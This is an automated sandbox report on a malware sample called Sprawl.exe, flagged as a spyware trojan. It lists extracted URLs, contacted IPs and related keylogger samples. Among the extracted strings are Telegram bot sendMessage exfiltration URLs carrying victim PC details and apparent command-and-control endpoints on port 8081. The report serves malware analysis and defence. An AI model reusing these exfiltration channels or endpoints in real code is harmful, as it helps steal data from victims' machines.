                                https://reallyfreegeoip.org/xml/173.254.250.76$msiexec.exe, 00000008.00000002.3378029055.0000000021EAC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021E67000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229CC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022987000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://duckduckgo.com/ac/?q=msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.orgmsiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://api.telegram.org/botmsiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://crl.microsoftpowershell.exe, 00000004.00000002.2786466269.00000000078E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2786466269.000000000792C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://contoso.com/Licensepowershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.office.com/lBmsiexec.exe, 00000008.00000002.3378029055.0000000021FB1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://smtp.ionos.esmsiexec.exe, 00000008.00000002.3378029055.0000000021FF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000009.00000002.3378186894.0000000022AA6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AD7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022A97000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            http://varders.kozow.com:8081msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://drive.gomsiexec.exe, 00000009.00000002.3362946153.0000000006F90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.google.commsiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2725870722.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2754100744.0000000005371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://drive.google.com/msiexec.exe, 00000008.00000002.3362918549.000000000657A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.000000000704A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://contoso.com/powershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2747850355.0000000005F08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000008.00000002.3378029055.0000000021F80000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://apis.google.commsiexec.exe, 00000008.00000003.2935707844.00000000065F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2936201345.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.3006706894.00000000070FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20amsiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2725870722.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2754100744.0000000005371000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://reallyfreegeoip.org/xml/msiexec.exe, 00000008.00000002.3378029055.0000000021E3C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.000000002295C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.office.com/msiexec.exe, 00000009.00000002.3378186894.0000000022AD7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022AC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://checkip.dyndns.org/C7Tmsiexec.exe, 00000009.00000002.3384976953.0000000024BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2747850355.0000000005F08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2754100744.00000000054C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2754100744.00000000054C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://contoso.com/Iconpowershell.exe, 00000004.00000002.2766047897.00000000063D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://drive.usercontent.google.com/msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://checkip.dyndns.orgmsiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://nsis.sf.net/NSIS_ErrorErrorSprawl.exe, Sprawl.exe.2.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
https://www.ecosia.org/newtab/ | msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://chrome.google.com/webstore?hl=en8 | msiexec.exe, 00000008.00000002.3378029055.0000000021F76000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.2754100744.00000000054C6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://drive.usercontent.google.com/U | msiexec.exe, 00000008.00000002.3362918549.00000000065E8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2985704004.00000000065F1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://aborters.duckdns.org:8081 | msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ac.ecosia.org/autocomplete?q= | msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.office.com/8 | msiexec.exe, 00000008.00000002.3378029055.0000000021FA7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://nsis.sf.net/NSIS_Error | Sprawl.exe, Sprawl.exe.2.dr | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?L | msiexec.exe, 00000008.00000002.3378029055.0000000021FE1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022B02000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://anotherarmy.dns.army:8081 | msiexec.exe, 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://reallyfreegeoip.org | msiexec.exe, 00000008.00000002.3378029055.0000000021EAC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021E3C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378029055.0000000021ED5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229F5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.000000002295C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3378186894.00000000229CC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | msiexec.exe, 00000008.00000002.3382228709.00000000230F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3382228709.0000000022E11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023931000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3382107427.0000000023C18000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
213.165.67.102 | smtp.ionos.es | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
142.250.184.238 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.250.185.65 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1539387
Start date and time: 2024-10-22 16:09:40 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Sprawl.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/18@6/6
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 193
• Number of non-executed functions: 53
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target msiexec.exe, PID 3212 because it is empty
• Execution Graph export aborted for target msiexec.exe, PID 4460 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Sprawl.exe
Time | Type | Description
10:10:34 | API Interceptor | 83x Sleep call for process: powershell.exe modified
10:12:03 | API Interceptor | 522x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | Rundholterne89.exe | malicious | GuLoader, Snake Keylogger
 | SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger
 | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
 | FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger
 | New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
 | 7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
 | TicariXHesapXXzetiniz.exe | malicious | GuLoader, Snake Keylogger
 | REVISED PROFORMA INVOICE STVC007934196.exe | malicious | Snake Keylogger, VIP Keylogger
 | MT103-539 PAYMENT (1).docx.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
 | SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
213.165.67.102 | Snvlerier.exe | malicious | GuLoader, Snake Keylogger
 | r8x1WvSkbWSUjXh6.exe | malicious | Snake Keylogger, VIP Keylogger
 | LisectAVT_2403002A_257.exe | malicious | AgentTesla
 | 60yQVZ67vj.exe | malicious | AgentTesla, PureLog Stealer
 | Nowe zam#U00f3wienie nr 201030019.exe | malicious | AgentTesla
 | Barotse.vbs | malicious | AgentTesla, GuLoader
 | SecuriteInfo.com.W32.MSIL_Kryptik.DSR.gen.Eldorado.16905.957.exe | malicious | AgentTesla, DarkTortilla
 | Quotation-ZX6350ZA Drilling Cum Milling Machine.vbs | malicious | AgentTesla, GuLoader
 | factra.exe | malicious | AgentTesla
 | factura.exe | malicious | AgentTesla, DarkTortilla
188.114.97.3 | Technical Datasheet and Specification_PDF.exe | malicious | Unknown | www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
 | request-BPp -RFQ 0975432.exe | malicious | PureLog Stealer | www.ergeneescortg.xyz/guou/
 | Halkbank_Ekstre_20230426_075819_154055.exe | malicious | FormBook | www.thetahostthe.top/9r5x/
 | http://comodozeropoint.com/updates/1736162964/N1/Team.exe | malicious | Unknown | comodozeropoint.com/updates/1736162964/N1/Team.exe
 | SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe | malicious | Unknown | servicetelemetryserver.shop/api/index.php
 | SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe | malicious | Unknown | servicetelemetryserver.shop/api/index.php
 | SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe | malicious | Unknown | servicetelemetryserver.shop/api/index.php
 | ZP4KZDHVHWZZ2DC13DMX.exe | malicious | Amadey | tipinfodownload-soft1.com/g9jvjfd73/index.php
 | aQdB62N7SB.elf | malicious | Shikitega, Xmrig | main.dsn.ovh/dns/loadbit
 | PO#071024.exe | malicious | FormBook | www.freedietbuilder.online/nnla/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
 | SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
 | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
 | FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | 188.114.96.3
 | New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
 | 7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
 | z547GEViTFyfCZdLZP.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.96.3
 | SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exe | malicious | Snake Keylogger | 188.114.96.3
 | TicariXHesapXXzetiniz.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
 | REVISED PROFORMA INVOICE STVC007934196.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
checkip.dyndns.com | Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | 193.122.130.0
 | SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
 | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.130.0
 | FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | 132.226.247.73
 | New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.6.168
 | 7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
 | 001_215_EA2047939_202410210815.exe | malicious | GuLoader, Snake Keylogger | 193.122.130.0
 | z547GEViTFyfCZdLZP.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.8.169
 | SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exe | malicious | Snake Keylogger | 193.122.6.168
 | TicariXHesapXXzetiniz.exe | malicious | GuLoader, Snake Keylogger | 132.226.8.169
smtp.ionos.es | Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | 213.165.67.118
 | Snvlerier.exe | malicious | GuLoader, Snake Keylogger | 213.165.67.118
 | Snvlerier.exe | malicious | GuLoader, Snake Keylogger | 213.165.67.102
 | Contrato de Cesin de Crditos Sin Recurso.exe | malicious | GuLoader, Snake Keylogger | 213.165.67.118
 | r8x1WvSkbWSUjXh6.exe | malicious | Snake Keylogger, VIP Keylogger | 213.165.67.102
 | ZcH50SI4q45Dtpf.exe | malicious | Snake Keylogger, VIP Keylogger | 213.165.67.118
 | LisectAVT_2403002A_257.exe | malicious | AgentTesla | 213.165.67.102
 | USyhqVZT33vX26Y.exe | malicious | AgentTesla | 213.165.67.118
 | 60yQVZ67vj.exe | malicious | AgentTesla, PureLog Stealer | 213.165.67.102
 | JUSTIFICANTE PAGO FACTURA.vbs | malicious | AgentTesla, GuLoader | 213.165.67.118
api.telegram.org | Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
 | SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
 | FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
 | New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
 | 7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
 | TicariXHesapXXzetiniz.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
 | REVISED PROFORMA INVOICE STVC007934196.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | MT103-539 PAYMENT (1).docx.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
 | SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
Associated Sample Name / URL | Detection | Threat Name | Context

Match: ORACLE-BMC-31898US
Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | 193.122.130.0
Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.130.0
New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.6.168
7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
001_215_EA2047939_202410210815.exe | malicious | GuLoader, Snake Keylogger | 193.122.130.0
SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exe | malicious | Snake Keylogger | 193.122.6.168
REVISED PROFORMA INVOICE STVC007934196.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
MT103-539 PAYMENT (1).docx.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
PaymentXConfirmationXcopy.xls | malicious | Snake Keylogger | 158.101.44.242
SUAlTWPjKQ.exe | malicious | PureLog Stealer, Snake Keylogger | 158.101.44.242

Match: TELEGRAMRU
Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TicariXHesapXXzetiniz.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
REVISED PROFORMA INVOICE STVC007934196.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
MT103-539 PAYMENT (1).docx.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220

Match: CLOUDFLARENETUS
https://www.elastic.co/security-labs/elevate-your-threat-hunting?utm_source=organic-social&utm_medium=twitter&utm_campaign=esl:_threat_research_esl_blog_post&utm_content=15000445268&linkId=626315843 | malicious | Cuba, Latrodectus, UACMe, Xmrig | 172.66.0.227
[EXTERNAL] Re_ Quotes.eml | malicious | Unknown | 172.67.128.229
https://apeidieppe-d.basiic.net/yKKWd | malicious | HTMLPhisher | 104.17.25.14
Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
BA4M310209H14956.xls | malicious | Remcos | 188.114.96.3
https://email.mail.customfeedback.com/c/eJyUkD-P1TAQxD9N3J2VXXuduHDxDpEGiQpE7T_rS_QS-8kxF45Pjw5EQ0c7oxnNb6I_Hn57KZ_4zSlEg2SizkA0WtbGjsF6M4G2SGHChMFrYhFr6T729wz6NOfRayKLZCipOVACmgA4mEwhEHnFbEVykCcMs2AHE1oCrQBF3trZP_uD3a0kbmctItd2-Za-cVhrvX9tu1t7f5yDug24DLj0WvdThra9rH2v0e8y1mPA5eT69NsbcPHp2MqAy1-6d-36U_j0imJ1SUcVQFkMMSitNMCkxpR4jhBtVFpsDkfUMCIAqlmhBPnxtujnDzdSSPoZLA16PPy2y_j97PXIzCn4eH9fI-7_88y_gHkrvkTeSq7yJyh5cZCxNpbXVlK9Tlm4D7iIw01GkxoBxKPVH29f6p2Lm2adApjs7az0FDRE8Hkeo9ETc4qzNqPxRFk0F9e2nb0-Vm7S77svgx7bo1XZOa7i1eGvAAAA__9cb6ca | malicious | Unknown | 104.16.20.118
BL Packing List & Invoice.xls | malicious | Unknown | 188.114.96.3
ProformaInvoice.xls | malicious | PureLog Stealer | 188.114.96.3
SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3

Match: ONEANDONE-ASBrauerstrasse48DE
Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | 213.165.67.118
Invoice.exe | malicious | FormBook, PureLog Stealer | 217.160.0.158
la.bot.powerpc.elf | malicious | Mirai | 212.227.7.42
Request for 30 Downpayment.exe | malicious | FormBook, PureLog Stealer | 217.160.0.93
la.bot.arm.elf | malicious | Unknown | 212.227.138.124
yakuza.m68k.elf | malicious | Unknown | 74.208.123.157
la.bot.powerpc.elf | malicious | Unknown | 217.160.111.108
Ageeconstruction -_(BENEFIT INSTRUCTIONS)_.docx | malicious | Mamba2FA | 217.160.0.215
